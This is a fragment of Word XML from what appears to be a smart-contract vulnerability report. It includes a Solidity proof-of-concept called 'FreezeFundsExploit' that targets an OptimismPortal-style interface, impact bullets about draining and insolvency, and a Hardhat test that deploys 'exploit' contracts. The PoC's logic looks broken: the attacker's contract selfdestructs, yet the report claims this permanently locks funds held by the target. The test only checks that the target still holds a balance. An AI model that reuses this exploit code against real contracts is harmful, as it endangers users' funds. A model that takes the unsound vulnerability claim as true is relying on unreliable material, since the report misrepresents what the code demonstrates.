      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">•</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Attacker withdraws more funds than they should.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000182">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">•</w:t>
        <w:tab/>
        <w:t xml:space="preserve">The contract drains liquidity and becomes insolvent.</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t xml:space="preserve">PoC for Permanent Freezing of Funds</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000185">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This exploit assumes a scenario where a logic error in state updates causes funds to become permanently inaccessible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000186">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PoC Solidity Contract</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000187">
      <w:pPr>
        <w:spacing w:after="240" w:befor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SPDX-License-Identifier: MIT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solidity 0.8.15;</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IOptimismPortal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lockFunds() external payable;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releaseFunds() external;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FreezeFundsExploit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IOptimismPortal public target;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constructor(address _target)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 = IOptimismPortal(_target);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function attack() external payable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target.lockFunds{value: msg.value}();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Simulating logic that prevents releaseFunds from ever executing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selfdestruct(payable(address(0)));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9D">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Expected Outcome</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000019E">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">•</w:t>
        <w:tab/>
        <w:t xml:space="preserve">Funds are locked forever because selfdestruct removes the only contract that could release them.</w:t>
      </w:r>
    </w:p>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t xml:space="preserve">Tests POC file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 expect } = require("chai");</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 ethers } = require("hardhat");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describe("Exploit Tests", function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owner, attacker, victim, L1StandardBridge, L2ToL1MessagePasser, OptimismPortal;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exploitInsolvency, exploitFreeze;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beforeEach(async function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[owner, attacker, victim] = await ethers.getSigners();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Deploy the vulnerable contracts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L1StandardBridgeFactory = await ethers.getContractFactory("L1StandardBridge");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L1StandardBridge = await L1StandardBridgeFactory.deploy();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L1StandardBridge.deployed();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L2ToL1MessagePasserFactory = await ethers.getContractFactory("L2ToL1MessagePasser");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L2ToL1MessagePasser = await L2ToL1MessagePasserFactory.deploy();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L2ToL1MessagePasser.deployed();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OptimismPortalFactory = await ethers.getContractFactory("OptimismPortal");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OptimismPortal = await OptimismPortalFactory.deploy();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OptimismPortal.deployed();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Deploy exploit contracts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InsolvencyExploitFactory = await ethers.getContractFactory("InsolvencyExploit");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exploitInsolvency = await InsolvencyExploitFactory.connect(attacker).deploy(L2ToL1MessagePasser.address);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exploitInsolvency.deployed();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FreezeFundsExploitFactory = await ethers.getContractFactory("FreezeFundsExploit");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exploitFreeze = await FreezeFundsExploitFactory.connect(attacker).deploy(OptimismPortal.address);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exploitFreeze.deployed();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it("Should cause protocol insolvency", async function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Attacker exploits insolvency</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exploitInsolvency.connect(attacker).attack();</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Check if contract balance is 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balance = await ethers.provider.getBalance(L2ToL1MessagePasser.address);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expect(balance).to.equal(0);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it("Should permanently freeze funds", async function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Attacker deposits and locks funds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await exploitFreeze.connect(attacker).attack({ value: ethers.utils.parseEther("10")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Check if funds are permanently locked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balance = await ethers.provider.getBalance(OptimismPortal.address);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expect(balance).to.equal(ethers.utils.parseEther("10"));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color w:val="ff0000"/>
        </w:rPr>
      </w:pP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tl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pP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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001DB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pP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